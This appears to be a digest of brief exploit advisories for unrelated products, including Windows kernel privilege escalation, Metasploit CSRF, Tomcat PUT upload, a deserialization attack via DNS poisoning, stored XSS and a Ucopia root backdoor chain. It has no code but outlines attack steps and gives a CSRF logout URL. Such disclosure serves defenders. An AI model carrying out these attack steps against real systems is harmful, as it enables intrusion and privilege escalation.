Exploits for the recently-patched win32kfull!bFill vulnerability. Executing the Palette or Bitmap exploit will give you SYSTEM privileges on the affected system. The exploits should work fine on Windows 10 x64 with Creators Update, build 15063.540 (latest version of Win10 before the release of Microsoft's September Updates). The Visual Studio solution contains three exploits: CVE-2016-3309_Reloaded_Bitmaps, CVE-2016-3309_Reloaded_Palettes and CVE-2016-3309_Reloaded_Deadlock.
Metasploit Pro, Express, Ultimate, and Community can encounter an issue of cross site request forgery (also known as one-click attack and is abbreviated as CSRF or XSRF), which is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack attempts to exploit the trust that a specific website has in a user's browser. The MSF did not protect the logout form with csrf token, therefore i can logout any user by sending this url https://Metasploit-Server-IP:3790/logout. It's less damaging than a traditional 'hack back' but is sure to irritate the local red team to no end. It's essentially a user DoS.
$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.
The following PoC bypasses the fix for the issue 1263. The PoC contains a function f() which creates an object o and then iterates over an object {xx: 0} and then prints the value of o[i].
ClipBucket is vulnerable to Remote Code Execution (RCE) due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.
Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
ERS Data System 1.8.1 allows remote attackers to execute arbitrary code, related to the use of com.branaghgroup.ecers.update.UpdateRequest deserialization. To exploit this vulnerability, an attacker can enable packet forwarding and poison DNS requests to the www.ersdata.com domain. Then, the attacker can run a request handler on the attacking machine, which will answer all requests with malicious serialized gadgets.
DiskBoss Enterprise v8.4.16 is vulnerable to a local buffer overflow vulnerability. An attacker can exploit this vulnerability by sending a specially crafted Share Name field to the application, which can lead to code execution.
Multiple Stored XSS vulnerabilities exist in EPESI, a web-based business information manager. The vulnerabilities exist in the Tasks, Phonecalls, Notes, and Alerts modules. An attacker can exploit these vulnerabilities by creating a new task, phonecall, note, or alert and entering malicious JavaScript code in the title, description, or subject fields. The malicious code will be stored in the database and executed when the user views the task, phonecall, note, or alert.
When a user connects to Ucopia wifi guest, every request is redirected to controller.access.network. An easier to use php backdoor can be created by sending a request to controller.access.network/autoconnect_redirector.php. As php is in sudoers without password, a request can be sent to controller.access.network/upload/bd.php to execute commands with sudo privileges. An ssh key can be pushed to the server to gain root access.
Services By CQR